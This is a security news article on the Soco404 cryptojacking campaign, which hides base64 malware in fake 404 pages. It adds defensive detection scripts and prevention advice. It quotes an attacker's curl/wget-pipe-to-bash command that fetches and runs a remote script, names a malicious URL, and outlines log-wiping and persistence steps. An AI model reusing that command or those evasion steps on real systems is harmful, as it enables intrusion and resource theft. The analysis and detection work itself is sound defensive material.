Cybercriminals Exploit Fake Error Pages to Deploy Platform-Specific Malware on Linux and Windows Systems

A new wave of cryptojacking attacks, dubbed Soco404, is exploiting seemingly innocuous 404 error pages to deliver malicious payloads to both Linux and Windows systems. By embedding base64-encoded malware within these error screens, attackers can bypass traditional security measures and hijack system resources for cryptocurrency mining.

Understanding Soco404 Attacks

The Soco404 campaign leverages fake error pages hosted on platforms like Google Sites and compromised Apache Tomcat servers. These pages contain hidden base64-encoded payloads that, when decoded, execute malicious binaries on the target system. This method allows attackers to evade detection by traditional URL filtering and static analysis tools, as the malicious content is concealed within standard HTML tags.

First identified in mid-2025, Soco404 appears to be an evolution of earlier cryptojacking campaigns that targeted weak Tomcat credentials and unpatched Atlassian Confluence instances. Researchers at Wiz.io discovered this variant while monitoring unusual shell activity from publicly exposed PostgreSQL databases—a service that nearly one-third of cloud tenants leave open to the internet.

Infection Mechanism

The attack begins when a loader fetches a fake error page from a malicious URL, such as `https://www.fastsoco.top/1`. Within this page, the base64-encoded payload is hidden between custom markers like `exe101`. The loader decodes this payload directly into memory, effectively bypassing disk-based scanners.
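Because the payload is plain base64 sitting between repeated marker tokens, a defender can scan fetched error pages for exactly that shape and check whether the decoded bytes carry an executable header. The scanner below is an added example written for this article, not code from the Wiz report or from the campaign itself. It assumes the marker shape generalises from the page's `exe101` example (a short alphanumeric tag repeated before and after the blob); the sample pages and the "binaries" inside them are constructed byte strings that merely start with the ELF or PE magic.

```python
import base64
import re

# Magic bytes that identify native executables. A genuine 404 page has no reason to
# carry either, so a decoded blob starting with one of these is a strong signal.
EXECUTABLE_MAGIC = {
    b"\x7fELF": "ELF (Linux)",
    b"MZ": "PE (Windows)",
}

# Marker shape is an assumption generalised from the page's `exe101` example:
# a short alphanumeric tag repeated before and after a base64 run of 40+ characters.
# Whitespace is allowed inside the run because the blob may be line-wrapped.
HIDDEN_BLOB_RE = re.compile(r"([A-Za-z]{2,6}\d{2,4})([A-Za-z0-9+/=\s]{40,}?)\1")


def find_hidden_payloads(html: str) -> list:
    """Return one finding per marker-delimited base64 run that decodes cleanly."""
    findings = []
    for match in HIDDEN_BLOB_RE.finditer(html):
        marker = match.group(1)
        blob = re.sub(r"\s+", "", match.group(2))
        try:
            data = base64.b64decode(blob, validate=True)
        except ValueError:
            continue  # not real base64, e.g. an ordinary run of words in page text
        kind = "unknown"
        for magic, label in EXECUTABLE_MAGIC.items():
            if data.startswith(magic):
                kind = label
                break
        findings.append({"marker": marker, "size": len(data), "type": kind})
    return findings


# Constructed sample pages. The embedded "binaries" are short byte strings that only
# begin with the right magic; they are not real executables.
FAKE_PAGE_PE = (
    "<html><head><title>404 Not Found</title></head><body>"
    "<h1>Not Found</h1><p>The requested URL was not found on this server.</p>"
    "<!-- exe101"
    + base64.b64encode(b"MZ" + b"\x00" * 62 + b"constructed-sample").decode()
    + "exe101 -->"
    "</body></html>"
)
FAKE_PAGE_ELF = (
    "<div>err404" + base64.b64encode(b"\x7fELF" + b"\x00" * 60).decode() + "err404</div>"
)
CLEAN_PAGE = "<html><body><h1>404 Not Found</h1><p>Sorry, nothing here.</p></body></html>"

if __name__ == "__main__":
    for name, page in [("PE page", FAKE_PAGE_PE), ("ELF page", FAKE_PAGE_ELF), ("clean", CLEAN_PAGE)]:
        print(name, find_hidden_payloads(page))
```

Findings of type `unknown` are worth a look but are often just long tokens in page text; the executable-magic hits are the ones that should alert. A proxy or sandbox that already fetches error bodies can run this check on every response with a 4xx status, since the page's whole trick is that the HTTP layer looks harmless.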

Linux Infection Process:

1. Initial Command Execution: The attacker executes a command that downloads and runs a shell script:

```bash
sh -c (curl http://:8080/soco.sh || wget -q -O- http://:8080/soco.sh) | bash
```

2. Script Actions:
– Generates a random filename for the malicious binary.
– Terminates competing mining processes.
– Clears system logs to erase traces of the attack.
– If executed with root privileges, the script enables hugepages and adjusts CPU registers to optimize mining performance.

3. Execution and Persistence:
– A Go-based stub re-executes itself under the name `cpuhp/1`.
– The malware communicates with the attacker’s server and initiates an XMRig mining process targeting specific mining pools.

Windows Infection Process:

1. Payload Delivery: The attacker uses tools like `certutil`, `Invoke-WebRequest`, or `curl` to download a malicious executable (`ok.exe`) into the `C:\Users\Public\` directory.

2. Execution and Concealment:
– The executable spawns a `conhost.exe` process.
– Injects the main mining payload into this process.
– Deletes the original `ok.exe` file after a brief delay to minimize detection.

3. Persistence Mechanisms (both platforms):
– The malware disguises itself as legitimate processes, such as `sd-pam` or `kworker/R-rcu_p` on Linux, and random eight-character service names on Windows.
– It schedules cron jobs and shell-init hooks on Linux or disables Windows Event Log to maintain persistence and evade detection.
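The Linux disguises listed above (`cpuhp/1`, `kworker/R-rcu_p`, `sd-pam`) borrow names that belong to kernel threads or to a systemd helper, and that gives a defender something concrete to check: a real kernel thread is a child of `kthreadd` (PID 2) and has neither a command line nor an executable on disk, and a real `sd-pam` is spawned by a `systemd` user instance. The script below is an added example for this article, not code from the report or the campaign. The process table it runs on is constructed; the `/tmp/.x/a8Fk2` path is a made-up placeholder, and the `read_proc_table` helper is an assumption about how one would collect the same fields from a live Linux host.

```python
import os
import re

# Constructed process table (pid, ppid, comm, cmdline, exe). Kernel threads are children
# of kthreadd (PID 2) and have no cmdline and no backing executable.
SAMPLE_PROCS = [
    {"pid": 2,    "ppid": 0,    "comm": "kthreadd",        "cmdline": "",                              "exe": ""},
    {"pid": 17,   "ppid": 2,    "comm": "cpuhp/1",         "cmdline": "",                              "exe": ""},
    {"pid": 233,  "ppid": 2,    "comm": "kworker/0:1",     "cmdline": "",                              "exe": ""},
    {"pid": 1410, "ppid": 1,    "comm": "sshd",            "cmdline": "/usr/sbin/sshd -D",             "exe": "/usr/sbin/sshd"},
    {"pid": 1500, "ppid": 1,    "comm": "systemd",         "cmdline": "/usr/lib/systemd/systemd --user", "exe": "/usr/lib/systemd/systemd"},
    {"pid": 1501, "ppid": 1500, "comm": "sd-pam",          "cmdline": "(sd-pam)",                      "exe": "/usr/lib/systemd/systemd"},
    # Placeholder path: a user-space binary posing as a kernel thread, already unlinked.
    {"pid": 4521, "ppid": 1,    "comm": "cpuhp/1",         "cmdline": "cpuhp/1",                       "exe": "/tmp/.x/a8Fk2 (deleted)"},
    {"pid": 4530, "ppid": 4521, "comm": "kworker/R-rcu_p", "cmdline": "kworker/R-rcu_p",               "exe": "/tmp/.x/a8Fk2 (deleted)"},
    {"pid": 4540, "ppid": 4521, "comm": "sd-pam",          "cmdline": "sd-pam",                        "exe": "/tmp/.x/a8Fk2 (deleted)"},
]

# Name prefixes that only genuine kernel threads should carry.
KERNEL_THREAD_NAME_RE = re.compile(r"^(kworker|cpuhp|ksoftirqd|kswapd|migration|rcu_)")


def is_kernel_thread(proc: dict) -> bool:
    """kthreadd itself, or a child of kthreadd with no command line and no executable."""
    return proc["pid"] == 2 or (
        proc["ppid"] == 2 and proc["cmdline"] == "" and proc["exe"] == ""
    )


def find_masquerading_processes(procs: list) -> list:
    """Flag processes whose name claims a kernel or systemd role their lineage does not support."""
    by_pid = {p["pid"]: p for p in procs}
    suspicious = []
    for p in procs:
        reasons = []
        name = p["comm"].strip("()")
        if KERNEL_THREAD_NAME_RE.match(name) and not is_kernel_thread(p):
            reasons.append("kernel-thread name but not a child of kthreadd (PID 2)")
            if p["exe"]:
                reasons.append(f"backed by an executable: {p['exe']}")
        elif name == "sd-pam":
            parent = by_pid.get(p["ppid"])
            if parent is None or parent["comm"] != "systemd":
                reasons.append("sd-pam not spawned by a systemd user instance")
        if p["exe"].endswith("(deleted)"):
            reasons.append("executable was deleted after launch")
        if reasons:
            suspicious.append({"pid": p["pid"], "comm": p["comm"], "reasons": reasons})
    return suspicious


def read_proc_table() -> list:
    """Collect the same fields from a live Linux /proc (run as root so exe links resolve)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/stat") as f:
                stat = f.read()
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\x00", b" ").decode(errors="replace").strip()
            try:
                exe = os.readlink(f"/proc/{entry}/exe")
            except OSError:
                exe = ""  # kernel threads have no exe link
        except OSError:
            continue  # process exited while we were reading
        head, _, tail = stat.rpartition(")")  # comm may contain spaces or parentheses
        comm = head.split("(", 1)[1]
        ppid = int(tail.split()[1])  # fields after comm: state, ppid, ...
        procs.append({"pid": int(entry), "ppid": ppid, "comm": comm, "cmdline": cmdline, "exe": exe})
    return procs


if __name__ == "__main__":
    for hit in find_masquerading_processes(SAMPLE_PROCS):
        print(hit["pid"], hit["comm"], "; ".join(hit["reasons"]))
```

The parent-process check is the robust part: names are free to forge, but a user-space process cannot make PID 2 its parent. The "(deleted)" signal matches the page's note that the loader removes its file after launch, and it is cheap to add to any existing host inventory that already reads `/proc`.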

Broader Context of Fake Error Page Exploits

The Soco404 campaign is part of a larger trend where cybercriminals use fake error messages to deceive users and deploy malware. For instance, attackers have been known to present fake CAPTCHA pages or browser error messages that prompt users to execute malicious commands. These tactics often involve instructing users to copy and paste commands into their system’s terminal, leading to the installation of malware such as information stealers or cryptominers.

Preventive Measures

To protect against such attacks, users and organizations should adopt the following practices:

– Exercise Caution with Error Messages: Be skeptical of unexpected error messages, especially those prompting manual actions like copying and pasting commands.

– Keep Systems Updated: Regularly update software and systems to patch vulnerabilities that attackers might exploit.

– Implement Network Segmentation: Limit exposure by segmenting networks and restricting access to critical systems.

– Monitor System Performance: Unexplained increases in CPU usage or power consumption can indicate unauthorized mining activities.

– Educate Users: Train employees to recognize phishing attempts and suspicious prompts that could lead to malware installation.

Conclusion

The Soco404 campaign underscores the evolving tactics of cybercriminals who exploit user trust and system vulnerabilities to deploy malware. By embedding malicious code within fake error pages, attackers can effectively bypass traditional security measures. Staying vigilant and implementing robust cybersecurity practices are essential to defend against such sophisticated threats.